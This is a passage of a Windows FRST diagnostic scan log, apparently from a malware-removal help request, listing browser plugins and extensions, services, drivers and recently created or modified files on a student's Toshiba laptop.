FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin6.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin7.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\browser\plugins\npMozCouponPrinter.dll [2012-10-19] (Coupons, Inc.)
FF Extension: Evernote Web Clipper - C:\Users\Lexi\AppData\Roaming\Mozilla\Firefox\Profiles\s9ln76d7.default-1398562510049\Extensions\{E0B8C461-F8FB-49b4-8373-FE32E9252800}.xpi [2015-12-08]
FF Extension: Skype extension - C:\Program Files (x86)\Mozilla Firefox\extensions\{AB2CE124-6272-4b12-94A9-7303C7397BD1} [2016-01-12] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{000a9d1c-beef-4f90-9363-039d445309b8}] - C:\Program Files (x86)\Google\Google Gears\Firefox
FF Extension: Google Gears - C:\Program Files (x86)\Google\Google Gears\Firefox [2010-08-20] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [discoversoan@orbiscom] - C:\Program Files (x86)\Discover\SOAN
FF Extension: Secure Online Account Numbers - C:\Program Files (x86)\Discover\SOAN [2010-11-20] [not signed]
FF HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Firefox\Extensions: [{91AEF2CA-157A-4EB0-9775-9AEB4CF8B382}] - C:\Users\Lexi\AppData\Local\{91AEF2CA-157A-4EB0-9775-9AEB4CF8B382}
FF Extension: XULRunner - C:\Users\Lexi\AppData\Local\{91AEF2CA-157A-4EB0-9775-9AEB4CF8B382} [2010-09-19] [not signed]
 
Chrome: 
=======
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.75\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.75\ppGoogleNaClPluginChrome.dll => No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.75\pdf.dll => No File
CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll => No File
CHR Plugin: (CouponNetwork Coupon Activator Netscape Plugin v. 5.0.0.0) - C:\Program Files (x86)\Mozilla Firefox\plugins\NPcol400.dll (Catalina Marketing Corporation)
CHR Plugin: (CouponNetwork Coupon Activator Netscape Plugin v. 5.0.0.0) - C:\Program Files (x86)\Mozilla Firefox\plugins\NPcol500.dll (Catalina Marketing Corporation)
CHR Plugin: (Coupons Inc., Coupon Printer Manager ) - C:\Program Files (x86)\Mozilla Firefox\plugins\npCouponPrinter.dll => No File
CHR Plugin: (Coupons Inc., Coupon Printer Manager ) - C:\Program Files (x86)\Mozilla Firefox\plugins\npMozCouponPrinter.dll => No File
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin2.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin3.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin4.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin5.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin6.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin7.dll (Apple Inc.)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MIF5BA~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MIF5BA~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (AmazonMP3DownloaderPlugin) - C:\Program Files (x86)\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin1017300.dll (Amazon.com, Inc.)
CHR Plugin: (DivX VOD Helper Plug-in) - C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll => No File
CHR Plugin: (DivX Web Player) - C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll => No File
CHR Plugin: (Foxit Reader Plugin for Mozilla) - C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll (Foxit Corporation)
CHR Plugin: (Google Earth Plugin) - C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
CHR Plugin: (Picasa) - C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll => No File
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.135\npGoogleUpdate3.dll => No File
CHR Plugin: (Java Platform SE 7 U7) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => No File
CHR Plugin: (McAfee Security Scanner +) - C:\Program Files (x86)\McAfee Security Scan\3.0.318\npMcAfeeMss.dll => No File
CHR Plugin: (My Web Search Plugin Stub) - C:\Program Files (x86)\MyWebSearch\bar\1.bin\NPMyWebS.dll => No File
CHR Plugin: (Windows Live® Photo Gallery) - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll => No File
CHR Plugin: (Shockwave Flash) - C:\windows\SysWOW64\Macromed\Flash\NPSWF32_11_6_602_180.dll => No File
CHR Plugin: (Java Deployment Toolkit 7.0.70.11) - C:\windows\SysWOW64\npDeployJava1.dll (Oracle Corporation)
CHR Plugin: (Silverlight Plug-In) - c:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll => No File
CHR Profile: C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (The Best Price (extension)) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\gehjddhojclknjlgakpfmhlhkbpeakjf [2013-07-04]
CHR Extension: (Any.do Extension) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdadialhpiikehpdeejjeiikopddkjem [2016-03-07]
CHR Extension: (Evernote Web) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\lbfehkoinhhcknnbdgnnmjhiladcgbol [2014-03-18]
CHR Extension: (Google Maps) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\lneaknkopdijkpnocmklfnjbeapigfbh [2015-09-28]
CHR Extension: (Springpad Extension) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\njhgeimnepehieioinbhmfpphfoocmng [2013-07-04]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-08-01]
CHR Extension: (My Chrome Theme) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\oehpjpccmlcalbenfhnacjeocbjdonic [2015-08-27]
CHR Extension: (Evernote Web Clipper) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\pioclpoplcdbaefihamjohnefbikjilc [2016-03-07]
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 ADVService; C:\Program Files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientService.exe [25704 2011-11-24] (Amazon.com) [File not signed]
R2 LeapFrog Connect Device Service; C:\Program Files (x86)\LeapFrog\LeapFrog Connect\CommandService.exe [7241728 2014-07-11] (LeapFrog Enterprises, Inc.) [File not signed]
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1513784 2015-10-05] (Malwarebytes)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
R2 PCCUJobMgr; C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.3.198\ccSvcHst.exe [126392 2009-08-24] (Symantec Corporation)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [315648 2015-09-28] (Realtek Semiconductor)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246472 2015-06-12] (Synaptics Incorporated)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 hitmanpro37; C:\windows\system32\drivers\hitmanpro37.sys [43664 2015-01-28] ()
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-03-08] (Malwarebytes)
R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [587264 2015-07-10] (Realtek                                            )
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [42696 2015-06-12] (Synaptics Incorporated)
S0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2012-07-05] (Duplex Secure Ltd.)
R3 Thotkey; C:\Windows\System32\drivers\Thotkey.sys [45728 2015-08-27] (Toshiba Corporation)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-10] ()
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
U3 idsvc; no ImagePath
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
U3 wpcsvc; no ImagePath
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-03-08 12:22 - 2016-03-08 12:24 - 00034224 _____ C:\Users\Lexi\Downloads\FRST.txt
2016-03-08 12:22 - 2016-03-08 12:22 - 02374144 _____ (Farbar) C:\Users\Lexi\Downloads\FRST64 (1).exe
2016-03-08 12:22 - 2016-03-08 12:22 - 00000000 ____D C:\FRST
2016-03-08 12:14 - 2016-03-08 12:14 - 00016148 _____ C:\WINDOWS\system32\DURABLE_Lexi_HistoryPrediction.bin
2016-03-08 09:47 - 2016-03-08 09:47 - 02374144 _____ (Farbar) C:\Users\Lexi\Downloads\FRST64.exe
2016-03-08 09:47 - 2016-03-08 09:47 - 01524224 _____ C:\Users\Lexi\Downloads\AdwCleaner.exe
2016-03-08 09:47 - 2016-03-08 09:47 - 00000000 ____D C:\Program Files (x86)\AdwCleaner
2016-03-08 09:28 - 2016-03-08 09:28 - 00001049 _____ C:\Users\Lexi\Documents\malwaresecondtime.txt
2016-03-08 09:27 - 2016-03-08 09:27 - 00081882 _____ C:\Users\Lexi\Documents\malwarfirsttime.txt
2016-03-07 23:01 - 2016-03-08 09:36 - 00000000 ____D C:\Users\Lexi\AppData\Local\Deployment
2016-03-07 18:10 - 2016-03-08 12:14 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-03-07 18:08 - 2016-03-07 18:08 - 00001186 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-03-07 18:08 - 2016-03-07 18:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-03-07 18:08 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-03-07 18:08 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-03-07 18:08 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-03-07 18:05 - 2016-03-07 18:07 - 22908888 _____ (Malwarebytes ) C:\Users\Lexi\Downloads\mbam-setup-2.2.0.1024.exe
2016-03-06 21:09 - 2016-03-06 21:09 - 00058906 _____ C:\Users\Lexi\Desktop\sfcdetails.txt
2016-03-04 09:58 - 2016-03-07 18:08 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-03-04 09:58 - 2016-03-04 09:58 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-03-03 23:59 - 2016-03-07 13:16 - 00000000 ____D C:\AdwCleaner
2016-03-02 17:45 - 2016-03-02 17:45 - 00002675 _____ C:\Users\Lexi\Downloads\Your Great Value Vacations The notice on that all  documents are ready 20160003149979 _.html
2016-03-01 19:50 - 2016-03-01 19:50 - 00024404 _____ C:\Users\Lexi\Downloads\Aerobic Cellular Respiration Summary Table.pdf
2016-03-01 19:31 - 2016-03-01 19:31 - 00008986 _____ C:\Users\Lexi\Downloads\Cellular Respiration and Fermentation Study Guide (1).pdf
2016-03-01 19:30 - 2016-03-01 19:30 - 00008986 _____ C:\Users\Lexi\Downloads\Cellular Respiration and Fermentation Study Guide.pdf
2016-02-29 16:32 - 2016-02-29 16:32 - 00346580 _____ C:\Users\Lexi\Downloads\securedoc_20160219T091446.html
2016-02-29 16:10 - 2016-02-29 16:10 - 00137376 _____ C:\Users\Lexi\Downloads\March homework 2016.pdf
2016-02-25 13:02 - 2016-02-25 21:16 - 08583186 _____ C:\Users\Lexi\Documents\AVG BIO101 template6.pptx
2016-02-24 23:06 - 2016-02-24 23:06 - 01112064 _____ C:\Users\Lexi\Downloads\05_Clicker_Questions.ppt
2016-02-24 23:05 - 2016-02-24 23:06 - 00773109 _____ C:\Users\Lexi\Downloads\06_Animations.zip
2016-02-24 23:05 - 2016-02-24 23:06 - 00747369 _____ C:\Users\Lexi\Downloads\06_Videos.zip
2016-02-24 23:05 - 2016-02-24 23:05 - 01201152 _____ C:\Users\Lexi\Downloads\06_Clicker_Questions (1).ppt
2016-02-24 23:04 - 2016-02-24 23:04 - 01201152 _____ C:\Users\Lexi\Downloads\06_Clicker_Questions.ppt
2016-02-21 17:28 - 2016-02-21 17:29 - 41085818 _____ C:\Users\Lexi\Downloads\05_Videos.zip
2016-02-21 17:28 - 2016-02-21 17:29 - 127679537 _____ C:\Users\Lexi\Downloads\05_BioFlix_Animations.zip
2016-02-21 17:28 - 2016-02-21 17:28 - 02486374 _____ C:\Users\Lexi\Downloads\05_Animations.zip
2016-02-20 00:06 - 2016-02-20 00:06 - 00014174 _____ C:\Users\Lexi\Downloads\Quiz 2  How Do Cells Function- Quiz Student Analysis Report.csv
2016-02-20 00:06 - 2016-02-20 00:06 - 00014174 _____ C:\Users\Lexi\Downloads\Quiz 2  How Do Cells Function- Quiz Student Analysis Report (1).csv
2016-02-11 22:52 - 2016-02-11 22:52 - 00028661 _____ C:\Users\Lexi\Downloads\A Tour of the Cell Study Guide (1).pdf
2016-02-10 12:09 - 2016-02-10 12:09 - 08817344 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerInstaller.exe
2016-02-10 09:09 - 2016-01-31 01:25 - 01951872 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-02-10 09:09 - 2016-01-31 01:25 - 01248896 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-02-10 09:09 - 2016-01-31 01:24 - 01824880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-02-10 09:09 - 2016-01-31 01:23 - 02601160 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-02-10 09:09 - 2016-01-31 01:23 - 01420392 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2016-02-10 09:09 - 2016-01-31 01:06 - 01535032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-02-10 09:09 - 2016-01-31 01:06 - 01531368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-02-10 09:09 - 2016-01-31 01:06 - 00809336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-02-10 09:09 - 2016-01-31 01:04 - 01811360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2016-02-10 09:09 - 2016-01-31 01:04 - 01180696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2016-02-10 09:09 - 2016-01-31 00:38 - 21873152 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-02-10 09:09 - 2016-01-31 00:34 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngckeyenum.dll
2016-02-10 09:09 - 2016-01-31 00:33 - 24593920 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-02-10 09:09 - 2016-01-31 00:33 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\system32\IoTAssignedAccessLockFramework.dll
2016-02-10 09:09 - 2016-01-31 00:29 - 11557888 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-02-10 09:09 - 2016-01-31 00:29 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasman.dll
2016-02-10 09:09 - 2016-01-31 00:26 - 06787072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-02-10 09:09 - 2016-01-31 00:26 - 03793408 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2016-02-10 09:09 - 2016-01-31 00:25 - 12504576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-02-10 09:09 - 2016-01-31 00:25 - 02237952 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-02-10 09:09 - 2016-01-31 00:25 - 00366592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2016-02-10 09:09 - 2016-01-31 00:25 - 00143872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2016-02-10 09:09 - 2016-01-31 00:24 - 00784384 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2016-02-10 09:09 - 2016-01-31 00:24 - 00047616 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2016-02-10 09:09 - 2016-01-31 00:24 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2016-02-10 09:09 - 2016-01-31 00:23 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2016-02-10 09:09 - 2016-01-31 00:22 - 00680448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2016-02-10 09:09 - 2016-01-31 00:20 - 02849792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-02-10 09:09 - 2016-01-31 00:19 - 01602560 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-02-10 09:09 - 2016-01-31 00:19 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkDesktopSettings.dll
2016-02-10 09:09 - 2016-01-31 00:19 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IoTAssignedAccessLockFramework.dll
2016-02-10 09:09 - 2016-01-31 00:18 - 00771072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-02-10 09:09 - 2016-01-31 00:18 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
2016-02-10 09:09 - 2016-01-31 00:17 - 19324928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-02-10 09:09 - 2016-01-31 00:17 - 00109056 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll
2016-02-10 09:09 - 2016-01-31 00:16 - 09889280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-02-10 09:09 - 2016-01-31 00:16 - 00950272 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-02-10 09:09 - 2016-01-31 00:14 - 07525376 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-02-10 09:09 - 2016-01-31 00:14 - 03588096 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-02-10 09:09 - 2016-01-31 00:13 - 04791808 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-02-10 09:09 - 2016-01-31 00:13 - 00123392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasman.dll
2016-02-10 09:09 - 2016-01-31 00:13 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\ztrace_maps.dll
2016-02-10 09:09 - 2016-01-31 00:11 - 05156352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-02-10 09:09 - 2016-01-31 00:11 - 00678400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2016-02-10 09:09 - 2016-01-31 00:11 - 00291840 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2016-02-10 09:09 - 2016-01-31 00:11 - 00162304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
2016-02-10 09:09 - 2016-01-31 00:07 - 18802176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-02-10 09:09 - 2016-01-31 00:06 - 02316800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-02-10 09:09 - 2016-01-31 00:05 - 01380864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-02-10 09:09 - 2016-01-31 00:05 - 00574464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2016-02-10 09:09 - 2016-01-31 00:05 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
2016-02-10 09:09 - 2016-01-31 00:04 - 00100352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll
2016-02-10 09:09 - 2016-01-31 00:02 - 03580416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-02-10 09:09 - 2016-01-31 00:02 - 00768000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-02-10 09:09 - 2016-01-31 00:00 - 11263488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-02-10 09:09 - 2016-01-30 23:59 - 05457408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-02-10 09:09 - 2016-01-30 23:58 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ztrace_maps.dll
2016-02-07 10:25 - 2016-02-07 10:25 - 00143306 _____ C:\Users\Lexi\Downloads\Module_1 (3).pdf
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-03-08 10:09 - 2012-04-07 21:50 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-03-08 09:02 - 2016-01-28 23:32 - 00004150 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{5ED844AE-3C2D-4062-87D9-F7E3150673DE}
2016-03-07 23:02 - 2010-08-20 12:24 - 00000000 ____D C:\Users\Lexi\AppData\Local\Google
2016-03-07 23:02 - 2010-05-28 20:42 - 00000000 ____D C:\Program Files (x86)\Google
2016-03-07 22:59 - 2013-05-28 16:57 - 00000000 ____D C:\Program Files (x86)\Evernote
2016-03-07 22:57 - 2011-01-14 18:51 - 00000000 ____D C:\ProgramData\Cozi
2016-03-07 22:56 - 2010-08-13 21:56 - 00000000 ____D C:\Program Files (x86)\TOSHIBA Corporation
2016-03-07 22:56 - 2010-05-28 20:35 - 00000000 ____D C:\Program Files (x86)\TOSHIBA
2016-03-07 22:56 - 2010-05-28 20:34 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-03-07 22:56 - 2010-05-28 20:34 - 00000000 ____D C:\Program Files\TOSHIBA
2016-03-07 22:54 - 2013-05-27 22:25 - 00000000 ____D C:\Program Files (x86)\Belarc
2016-03-07 22:49 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\system32\AppLocker
2016-03-07 22:31 - 2013-09-26 08:59 - 00000000 ____D C:\Users\Lexi\AppData\Local\Skitch
2016-03-07 22:28 - 2015-07-10 07:21 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-03-07 22:27 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\Provisioning
2016-03-07 22:27 - 2015-07-10 04:05 - 07864320 ___SH C:\WINDOWS\system32\config\BBI
2016-03-07 19:11 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\rescache
2016-03-07 18:35 - 2013-03-05 16:40 - 00002283 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-03-07 18:35 - 2013-03-05 16:40 - 00002271 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-03-07 14:27 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-03-07 14:24 - 2014-04-26 20:45 - 00000000 ____D C:\Users\Lexi\Documents\Bio101
2016-03-07 14:21 - 2015-07-10 06:04 - 00000000 ___HD C:\Program Files\WindowsApps
2016-03-07 14:07 - 2016-01-28 11:18 - 00000000 ____D C:\Users\Lexi\AppData\Local\Screencast-O-Matic-v2
2016-03-07 13:33 - 2015-08-27 20:13 - 00000000 ____D C:\Users\Lexi
2016-03-07 13:18 - 2013-06-18 14:19 - 00000000 ____D C:\Program Files (x86)\File Type Helper
2016-03-07 13:18 - 2013-02-20 00:03 - 00000000 ____D C:\WINDOWS\SysWOW64\C2MP
2016-03-07 13:17 - 2015-11-14 19:53 - 00000000 ____D C:\Users\DefaultAppPool
2016-03-07 13:16 - 2015-08-27 20:40 - 00000000 ____D C:\Users\Lexi\AppData\Local\Packages
2016-03-07 13:16 - 2015-07-10 08:14 - 00000000 ____D C:\WINDOWS\ShellNew
2016-03-07 13:16 - 2015-07-10 08:14 - 00000000 ____D C:\Program Files\Windows Journal
2016-03-07 13:16 - 2015-07-10 06:04 - 00000000 ____D C:\Program Files\Windows Defender
2016-03-07 13:16 - 2015-07-10 06:02 - 00000000 ____D C:\WINDOWS\INF
2016-03-07 13:16 - 2015-07-10 04:05 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2016-03-07 13:16 - 2015-01-28 09:55 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Evernote
2016-03-07 13:16 - 2013-09-10 08:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Coupons
2016-03-07 13:16 - 2013-09-10 08:38 - 00000000 ____D C:\Program Files (x86)\Coupons
2016-03-07 13:16 - 2013-01-17 18:40 - 00000000 ____D C:\Program Files (x86)\BodyMedia
2016-03-07 13:16 - 2012-12-03 01:42 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2016-03-07 13:16 - 2012-09-15 23:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Garmin
2016-03-07 13:16 - 2012-09-15 23:53 - 00000000 ____D C:\Program Files (x86)\Garmin
2016-03-07 13:16 - 2012-06-22 18:42 - 00000000 ____D C:\Users\Lexi\AppData\Roaming\PCCUStubInstaller
2016-03-07 13:16 - 2012-06-18 22:23 - 00000000 ____D C:\Program Files (x86)\LG Electronics
2016-03-07 13:16 - 2011-08-24 08:49 - 00000000 ____D C:\Program Files (x86)\Bing Bar Installer
2016-03-07 13:16 - 2011-05-20 12:30 - 00000000 ____D C:\Users\Lexi\AppData\LocalLow\Conduit
2016-03-07 13:16 - 2010-09-19 09:15 - 00000000 ____D C:\Users\Lexi\AppData\Local\Microsoft Help
2016-03-07 13:03 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\SystemResources
2016-03-07 13:03 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\registration
2016-03-07 12:58 - 2010-08-13 21:25 - 00000000 __RHD C:\MSOCache
2016-03-04 11:31 - 2010-08-13 21:57 - 00000000 ___HD C:\WINDOWS\msdownld.tmp
2016-03-04 07:39 - 2015-08-28 00:05 - 00000000 ___DC C:\WINDOWS\Panther
2016-03-04 07:19 - 2015-10-30 04:42 - 00000000 ___HD C:\$WINDOWS.~BT
2016-03-03 23:16 - 2012-11-10 18:24 - 00000000 ____D C:\Users\Lexi\Documents\Storia
2016-02-16 22:41 - 2016-01-12 21:09 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
